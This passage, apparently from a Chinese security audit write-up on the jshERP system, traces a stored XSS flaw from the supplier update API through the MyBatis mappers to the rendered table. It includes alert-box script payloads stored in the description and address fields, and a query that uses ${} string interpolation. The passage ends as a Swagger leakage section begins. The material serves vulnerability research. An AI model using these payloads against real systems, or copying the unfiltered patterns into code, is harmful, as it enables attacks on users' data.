<span class=k>new</span> <span class=n>StringBuffer</span><span class=o>(</span><span class=n>BusinessConstants</span><span class=o>.</span><span class=na>LOG_OPERATION_TYPE_EDIT</span><span class=o>).</span><span class=na>append</span><span class=o>(</span><span class=n>supplier</span><span class=o>.</span><span class=na>getSupplier</span><span class=o>()).</span><span class=na>toString</span><span class=o>(),</span> <span class=n>request</span><span class=o>);</span>
<span class=o>}</span><span class=k>catch</span><span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>){</span>
<span class=n>JshException</span><span class=o>.</span><span class=na>writeFail</span><span class=o>(</span><span class=n>logger</span><span class=o>,</span> <span class=n>e</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>return</span> <span class=n>result</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>成功找到对应的Mapper即SupplierMapper并且操作id为updateByPrimaryKeySelective在相应的xml文件中找到更新的sql语句</p>
<div class=highlight><pre><span></span><span class=nt>&lt;update</span> <span class=na>id=</span><span class=s>"updateByPrimaryKeySelective"</span> <span class=na>parameterType=</span><span class=s>"com.jsh.erp.datasource.entities.Supplier"</span><span class=nt>&gt;</span>
update jsh_supplier
<span class=nt>&lt;set&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"supplier != null"</span><span class=nt>&gt;</span>
supplier = #{supplier,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"contacts != null"</span><span class=nt>&gt;</span>
contacts = #{contacts,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"phoneNum != null"</span><span class=nt>&gt;</span>
phone_num = #{phoneNum,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"email != null"</span><span class=nt>&gt;</span>
email = #{email,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"description != null"</span><span class=nt>&gt;</span>
description = #{description,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"isystem != null"</span><span class=nt>&gt;</span>
isystem = #{isystem,jdbcType=TINYINT},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"type != null"</span><span class=nt>&gt;</span>
type = #{type,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"enabled != null"</span><span class=nt>&gt;</span>
enabled = #{enabled,jdbcType=BIT},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"advanceIn != null"</span><span class=nt>&gt;</span>
advance_in = #{advanceIn,jdbcType=DECIMAL},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"beginNeedGet != null"</span><span class=nt>&gt;</span>
begin_need_get = #{beginNeedGet,jdbcType=DECIMAL},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"beginNeedPay != null"</span><span class=nt>&gt;</span>
begin_need_pay = #{beginNeedPay,jdbcType=DECIMAL},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"allNeedGet != null"</span><span class=nt>&gt;</span>
all_need_get = #{allNeedGet,jdbcType=DECIMAL},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"allNeedPay != null"</span><span class=nt>&gt;</span>
all_need_pay = #{allNeedPay,jdbcType=DECIMAL},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"fax != null"</span><span class=nt>&gt;</span>
fax = #{fax,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"telephone != null"</span><span class=nt>&gt;</span>
telephone = #{telephone,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"address != null"</span><span class=nt>&gt;</span>
address = #{address,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"taxNum != null"</span><span class=nt>&gt;</span>
tax_num = #{taxNum,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"bankName != null"</span><span class=nt>&gt;</span>
bank_name = #{bankName,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"accountNumber != null"</span><span class=nt>&gt;</span>
account_number = #{accountNumber,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"taxRate != null"</span><span class=nt>&gt;</span>
tax_rate = #{taxRate,jdbcType=DECIMAL},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"tenantId != null"</span><span class=nt>&gt;</span>
tenant_id = #{tenantId,jdbcType=BIGINT},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"deleteFlag != null"</span><span class=nt>&gt;</span>
delete_flag = #{deleteFlag,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;/set&gt;</span>
where id = #{id,jdbcType=BIGINT}
<span class=nt>&lt;/update&gt;</span>
</pre></div>
<p>这整条数据流就是将攻击向量存入数据库的过程中间的方法为进行任何的过滤filter层也没有对输入进行过滤。</p>
<p>现在需要触发xss只需要将相关参数显示在界面中即可。</p>
<p><strong>读取点分析</strong></p>
<p>读取supplier还有另一个api根据前端观察可以知道为/supplier/list</p>
<p>同样在</p>
<div class=highlight><pre><span></span><span class=nd>@GetMapping</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"/{apiName}/list"</span><span class=o>)</span>
<span class=kd>public</span> <span class=n>String</span> <span class=nf>getList</span><span class=o>(</span><span class=nd>@PathVariable</span><span class=o>(</span><span class=s>"apiName"</span><span class=o>)</span> <span class=n>String</span> <span class=n>apiName</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>PAGE_SIZE</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>Integer</span> <span class=n>pageSize</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>CURRENT_PAGE</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>Integer</span> <span class=n>currentPage</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>String</span> <span class=n>search</span><span class=o>,</span>
<span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>String</span><span class=o>&gt;</span> <span class=n>parameterMap</span> <span class=o>=</span> <span class=n>ParamUtils</span><span class=o>.</span><span class=na>requestToMap</span><span class=o>(</span><span class=n>request</span><span class=o>);</span>
<span class=n>parameterMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>,</span> <span class=n>search</span><span class=o>);</span>
<span class=n>PageQueryInfo</span> <span class=n>queryInfo</span> <span class=o>=</span> <span class=k>new</span> <span class=n>PageQueryInfo</span><span class=o>();</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;</span> <span class=n>objectMap</span> <span class=o>=</span> <span class=k>new</span> <span class=n>HashMap</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;();</span>
<span class=k>if</span> <span class=o>(</span><span class=n>pageSize</span> <span class=o>!=</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=n>pageSize</span> <span class=o>&lt;=</span> <span class=mi>0</span><span class=o>)</span> <span class=o>{</span>
<span class=n>pageSize</span> <span class=o>=</span> <span class=mi>10</span><span class=o>;</span>
<span class=o>}</span>
<span class=n>String</span> <span class=n>offset</span> <span class=o>=</span> <span class=n>ParamUtils</span><span class=o>.</span><span class=na>getPageOffset</span><span class=o>(</span><span class=n>currentPage</span><span class=o>,</span> <span class=n>pageSize</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>StringUtil</span><span class=o>.</span><span class=na>isNotEmpty</span><span class=o>(</span><span class=n>offset</span><span class=o>))</span> <span class=o>{</span>
<span class=n>parameterMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>OFFSET</span><span class=o>,</span> <span class=n>offset</span><span class=o>);</span>
<span class=o>}</span>
<span class=c1>// 这里</span>
<span class=n>List</span><span class=o>&lt;?&gt;</span> <span class=n>list</span> <span class=o>=</span> <span class=n>configResourceManager</span><span class=o>.</span><span class=na>select</span><span class=o>(</span><span class=n>apiName</span><span class=o>,</span> <span class=n>parameterMap</span><span class=o>);</span>
<span class=c1>// 会将查询到的参数放在map的page参数中</span>
<span class=n>objectMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=s>"page"</span><span class=o>,</span> <span class=n>queryInfo</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>list</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setRows</span><span class=o>(</span><span class=k>new</span> <span class=n>ArrayList</span><span class=o>&lt;</span><span class=n>Object</span><span class=o>&gt;());</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setTotal</span><span class=o>(</span><span class=n>BusinessConstants</span><span class=o>.</span><span class=na>DEFAULT_LIST_NULL_NUMBER</span><span class=o>);</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=s>"查找不到数据"</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setRows</span><span class=o>(</span><span class=n>list</span><span class=o>);</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setTotal</span><span class=o>(</span><span class=n>configResourceManager</span><span class=o>.</span><span class=na>counts</span><span class=o>(</span><span class=n>apiName</span><span class=o>,</span> <span class=n>parameterMap</span><span class=o>));</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>name</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
<p>和上述分析过程一致,得到一下查询语句</p>
<div class=highlight><pre><span></span><span class=nt>&lt;select</span> <span class=na>id=</span><span class=s>"selectByConditionSupplier"</span> <span class=na>parameterType=</span><span class=s>"com.jsh.erp.datasource.entities.SupplierExample"</span> <span class=na>resultMap=</span><span class=s>"com.jsh.erp.datasource.mappers.SupplierMapper.BaseResultMap"</span><span class=nt>&gt;</span>
select *
FROM jsh_supplier
where 1=1
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"supplier != null"</span><span class=nt>&gt;</span>
and supplier like '%${supplier}%'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"type != null"</span><span class=nt>&gt;</span>
and type='${type}'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"phonenum != null"</span><span class=nt>&gt;</span>
and phone_num like '%${phonenum}%'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"telephone != null"</span><span class=nt>&gt;</span>
and telephone like '%${telephone}%'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"description != null"</span><span class=nt>&gt;</span>
and description like '%${description}%'
<span class=nt>&lt;/if&gt;</span>
and ifnull(delete_flag,'0') !='1'
order by id desc
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"offset != null and rows != null"</span><span class=nt>&gt;</span>
limit #{offset},#{rows}
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;/select&gt;</span>
</pre></div>
<p>这将数据库中的全部字段结果返回最后封装在json的page参数中</p>
<p>现在需要寻找将这些结果渲染到前端页面的html文件使用ajax必定会对响应的路由发起请求搜索/supplier/list</p>
<p>在supplier.js文件中</p>
<div class=highlight><pre><span></span><span class=kd>function</span> <span class=nx>showSupplierDetails</span><span class=p>(</span><span class=nx>pageNo</span><span class=p>,</span><span class=nx>pageSize</span><span class=p>)</span> <span class=p>{</span>
<span class=kd>var</span> <span class=nx>supplier</span> <span class=o>=</span> <span class=nx>$</span><span class=p>.</span><span class=nx>trim</span><span class=p>(</span><span class=nx>$</span><span class=p>(</span><span class=s2>"#searchSupplier"</span><span class=p>).</span><span class=nx>val</span><span class=p>());</span>
<span class=kd>var</span> <span class=nx>phonenum</span> <span class=o>=</span> <span class=nx>$</span><span class=p>.</span><span class=nx>trim</span><span class=p>(</span><span class=nx>$</span><span class=p>(</span><span class=s2>"#searchPhonenum"</span><span class=p>).</span><span class=nx>val</span><span class=p>());</span>
<span class=kd>var</span> <span class=nx>telephone</span> <span class=o>=</span> <span class=nx>$</span><span class=p>.</span><span class=nx>trim</span><span class=p>(</span><span class=nx>$</span><span class=p>(</span><span class=s2>"#searchTelephone"</span><span class=p>).</span><span class=nx>val</span><span class=p>());</span>
<span class=kd>var</span> <span class=nx>description</span> <span class=o>=</span> <span class=nx>$</span><span class=p>.</span><span class=nx>trim</span><span class=p>(</span><span class=nx>$</span><span class=p>(</span><span class=s2>"#searchDesc"</span><span class=p>).</span><span class=nx>val</span><span class=p>());</span>
<span class=nx>$</span><span class=p>.</span><span class=nx>ajax</span><span class=p>({</span>
<span class=nx>type</span><span class=o>:</span><span class=s2>"get"</span><span class=p>,</span>
<span class=nx>url</span><span class=o>:</span> <span class=s2>"/supplier/list"</span><span class=p>,</span>
<span class=nx>dataType</span><span class=o>:</span> <span class=s2>"json"</span><span class=p>,</span>
<span class=nx>data</span><span class=o>:</span> <span class=p>({</span>
<span class=nx>search</span><span class=o>:</span> <span class=nx>JSON</span><span class=p>.</span><span class=nx>stringify</span><span class=p>({</span>
<span class=nx>supplier</span><span class=o>:</span> <span class=nx>supplier</span><span class=p>,</span>
<span class=nx>type</span><span class=o>:</span> <span class=nx>listType</span><span class=p>,</span>
<span class=nx>phonenum</span><span class=o>:</span> <span class=nx>phonenum</span><span class=p>,</span>
<span class=nx>telephone</span><span class=o>:</span> <span class=nx>telephone</span><span class=p>,</span>
<span class=nx>description</span><span class=o>:</span> <span class=nx>description</span>
<span class=p>}),</span>
<span class=nx>currentPage</span><span class=o>:</span> <span class=nx>pageNo</span><span class=p>,</span>
<span class=nx>pageSize</span><span class=o>:</span> <span class=nx>pageSize</span>
<span class=p>}),</span>
<span class=nx>success</span><span class=o>:</span> <span class=kd>function</span> <span class=p>(</span><span class=nx>res</span><span class=p>)</span> <span class=p>{</span>
<span class=k>if</span><span class=p>(</span><span class=nx>res</span> <span class=o>&amp;&amp;</span> <span class=nx>res</span><span class=p>.</span><span class=nx>code</span> <span class=o>===</span> <span class=mi>200</span><span class=p>){</span>
<span class=k>if</span><span class=p>(</span><span class=nx>res</span><span class=p>.</span><span class=nx>data</span> <span class=o>&amp;&amp;</span> <span class=nx>res</span><span class=p>.</span><span class=nx>data</span><span class=p>.</span><span class=nx>page</span><span class=p>)</span> <span class=p>{</span>
<span class=nx>$</span><span class=p>(</span><span class=s2>"#tableData"</span><span class=p>).</span><span class=nx>datagrid</span><span class=p>(</span><span class=s1>'loadData'</span><span class=p>,</span> <span class=nx>res</span><span class=p>.</span><span class=nx>data</span><span class=p>.</span><span class=nx>page</span><span class=p>);</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=p>},</span>
<span class=c1>//此处添加错误处理</span>
<span class=nx>error</span><span class=o>:</span><span class=kd>function</span><span class=p>()</span> <span class=p>{</span>
<span class=nx>$</span><span class=p>.</span><span class=nx>messager</span><span class=p>.</span><span class=nx>alert</span><span class=p>(</span><span class=s1>'查询提示'</span><span class=p>,</span><span class=s1>'查询数据后台异常,请稍后再试!'</span><span class=p>,</span><span class=s1>'error'</span><span class=p>);</span>
<span class=k>return</span><span class=p>;</span>
<span class=p>}</span>
<span class=p>});</span>
<span class=p>}</span>
</pre></div>
<p>这里对相应的url发起请求并将其渲染至id为tableData的标签中</p>
<p>寻找调用showSupplierDetails方法的地方与之匹配的是同文件的initTableData方法在该方法中只显示了如下参数</p>
<div class=highlight><pre><span></span><span class=nx>columns</span><span class=o>:</span><span class=p>[[</span>
<span class=p>{</span> <span class=nx>field</span><span class=o>:</span> <span class=s1>'id'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>35</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>,</span><span class=nx>checkbox</span><span class=o>:</span><span class=kc>true</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'操作'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'op'</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>60</span><span class=p>,</span>
<span class=nx>formatter</span><span class=o>:</span><span class=kd>function</span><span class=p>(</span><span class=nx>value</span><span class=p>,</span><span class=nx>rec</span><span class=p>,</span><span class=nx>index</span><span class=p>)</span> <span class=p>{</span>
<span class=kd>var</span> <span class=nx>str</span> <span class=o>=</span> <span class=s1>''</span><span class=p>;</span>
<span class=nx>str</span> <span class=o>+=</span> <span class=s1>'&lt;img title="编辑" src="/js/easyui/themes/icons/pencil.png" style="cursor: pointer;" onclick="editSupplier(\''</span> <span class=o>+</span> <span class=nx>index</span> <span class=o>+</span> <span class=s1>'\');"/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;'</span><span class=p>;</span>
<span class=k>if</span><span class=p>(</span><span class=nx>isShowOpFun</span><span class=p>())</span> <span class=p>{</span>
<span class=nx>str</span> <span class=o>+=</span> <span class=s1>'&lt;img title="删除" src="/js/easyui/themes/icons/edit_remove.png" style="cursor: pointer;" onclick="deleteSupplier(\''</span> <span class=o>+</span> <span class=nx>rec</span><span class=p>.</span><span class=nx>id</span> <span class=o>+</span> <span class=s1>'\');"/&gt;'</span><span class=p>;</span>
<span class=p>}</span>
<span class=k>return</span> <span class=nx>str</span><span class=p>;</span>
<span class=p>}</span>
<span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'名称'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'supplier'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>150</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'联系人'</span><span class=p>,</span> <span class=nx>field</span><span class=o>:</span> <span class=s1>'contacts'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>50</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'手机号码'</span><span class=p>,</span> <span class=nx>field</span><span class=o>:</span> <span class=s1>'telephone'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>100</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'电子邮箱'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'email'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>80</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'联系电话'</span><span class=p>,</span> <span class=nx>field</span><span class=o>:</span> <span class=s1>'phoneNum'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>100</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'传真'</span><span class=p>,</span> <span class=nx>field</span><span class=o>:</span> <span class=s1>'fax'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>100</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'预付款'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'advanceIn'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>70</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'期初应收'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'beginNeedGet'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>70</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'期初应付'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'beginNeedPay'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>70</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'期末应收'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'allNeedGet'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>70</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'期末应付'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'allNeedPay'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>70</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'税率(%)'</span><span class=p>,</span> <span class=nx>field</span><span class=o>:</span> <span class=s1>'taxRate'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>60</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'状态'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'enabled'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>70</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>,</span><span class=nx>formatter</span><span class=o>:</span><span class=kd>function</span><span class=p>(</span><span class=nx>value</span><span class=p>){</span>
<span class=k>return</span> <span class=nx>value</span><span class=o>?</span> <span class=s2>"&lt;span style='color:green'&gt;启用&lt;/span&gt;"</span><span class=o>:</span><span class=s2>"&lt;span style='color:red'&gt;禁用&lt;/span&gt;"</span><span class=p>;</span>
<span class=p>}}</span>
<span class=p>]]</span>
</pre></div>
<p>因此在插入攻击向量时需要在显示的参数中进行选择当然还需要考虑前端的js过滤。</p>
<p>调用initTableData方法的地方在supplier.js中</p>
<div class=highlight><pre><span></span><span class=c1>//初始化界面</span>
<span class=nx>$</span><span class=p>(</span><span class=kd>function</span><span class=p>()</span> <span class=p>{</span>
<span class=kd>var</span> <span class=nx>listTitle</span> <span class=o>=</span> <span class=s2>""</span><span class=p>;</span> <span class=c1>//单据标题</span>
<span class=kd>var</span> <span class=nx>listType</span> <span class=o>=</span> <span class=s2>""</span><span class=p>;</span> <span class=c1>//类型</span>
<span class=kd>var</span> <span class=nx>listTypeEn</span> <span class=o>=</span> <span class=s2>""</span><span class=p>;</span> <span class=c1>//英文类型</span>
<span class=nx>getType</span><span class=p>();</span>
<span class=nx>initTableData</span><span class=p>();</span>
<span class=nx>ininPager</span><span class=p>();</span>
<span class=nx>bindEvent</span><span class=p>();</span>
<span class=p>});</span>
</pre></div>
<p>这个在引入js时即会调用全局搜索引入supplier.js的地方</p>
<p><a id=img18 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233356-500a2e40-c117-1.png><img src=
<p>在customer.html文件中找到了id为tableData的table</p>
<div class=highlight><pre><span></span><span class=p>&lt;</span><span class=nt>table</span> <span class=na>id</span><span class=o>=</span><span class=s>"tableData"</span> <span class=na>style</span><span class=o>=</span><span class=s>"top:300px;border-bottom-color:#FFFFFF"</span><span class=p>&gt;&lt;/</span><span class=nt>table</span><span class=p>&gt;</span>
</pre></div>
<p>整个流程到这里结束</p>
<h4>测试</h4>
<p>触发界面</p>
<p><a id=img19 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233410-582e6ac8-c117-1.png><img src="
<p>抓包</p>
<p><a id=img20 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233422-5f64d1ce-c117-1.png><img src="
<p>后台执行的SQL语句</p>
<div class=highlight><pre><span></span><span class=k>UPDATE</span> <span class=n>jsh_supplier</span> <span class=k>SET</span> <span class=n>supplier</span> <span class=o>=</span> <span class=s1>'客户1'</span><span class=p>,</span> <span class=n>contacts</span> <span class=o>=</span> <span class=s1>'小李'</span><span class=p>,</span> <span class=n>phone_num</span> <span class=o>=</span> <span class=s1>'12345678'</span><span class=p>,</span> <span class=n>email</span> <span class=o>=</span> <span class=s1>''</span><span class=p>,</span> <span class=n>description</span> <span class=o>=</span> <span class=s1>'&lt;script&gt;alert(\'</span><span class=k>desc</span><span class=err>\</span><span class=s1>')&lt;/script&gt;'</span><span class=p>,</span> <span class=k>type</span> <span class=o>=</span> <span class=s1>'客户'</span><span class=p>,</span> <span class=n>enabled</span> <span class=o>=</span> <span class=mi>1</span><span class=p>,</span> <span class=n>begin_need_get</span> <span class=o>=</span> <span class=s1>'0'</span><span class=p>,</span> <span class=n>begin_need_pay</span> <span class=o>=</span> <span class=s1>'0'</span><span class=p>,</span> <span class=n>all_need_get</span> <span class=o>=</span> <span class=s1>'80'</span><span class=p>,</span> <span class=n>fax</span> <span class=o>=</span> <span class=s1>''</span><span class=p>,</span> <span class=n>telephone</span> <span class=o>=</span> <span class=s1>''</span><span class=p>,</span> <span class=n>address</span> <span class=o>=</span> <span class=s1>'&lt;script&gt;alert(\'</span><span class=n>address</span><span class=err>\</span><span class=s1>')&lt;/script&gt;'</span><span class=p>,</span> <span class=n>tax_num</span> <span class=o>=</span> <span class=s1>''</span><span class=p>,</span> <span class=n>bank_name</span> <span class=o>=</span> <span class=s1>''</span><span class=p>,</span> <span class=n>account_number</span> <span class=o>=</span> <span class=s1>''</span><span class=p>,</span> <span class=n>tax_rate</span> <span class=o>=</span> <span class=s1>'12'</span> <span class=k>WHERE</span> <span class=n>jsh_supplier</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=n>id</span> <span class=o>=</span> <span class=mi>58</span>
</pre></div>
<p>刷新界面触发XSS弹窗</p>
<p><a id=img21 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233435-6774066e-c117-1.png><img src=
<h3 id=toc-14>其他漏洞点</h3>
<p><a id=img22 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233446-6ded6800-c117-1.png><img src="
<p><a id=img23 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233500-75e6b0e8-c117-1.png><img src="
<p><a id=img24 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233517-801a467e-c117-1.png><img src=
<p>还存在很多,不一一列举</p>
<h2 id=toc-15>信息泄露</h2>
<h3 id=toc-16>swagger-api文档信息泄露</h3>
<h4>关键点</h4>
<p>Swagger是一个规范和完整的框架用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。总体目标是使客户端和文件系统作为服务器以同样的速度来更新。</p>
<p>spring项目中的配置参考<a href=https://developer.aliyun.com/article/1361365 target=_blank>解决 Swagger API 未授权访问漏洞:完善分析与解决方案-阿里云开发者社区 (aliyun.com)</a></p>
<p>相关路径在实际测试工程中可用以下字典fuzz</p>
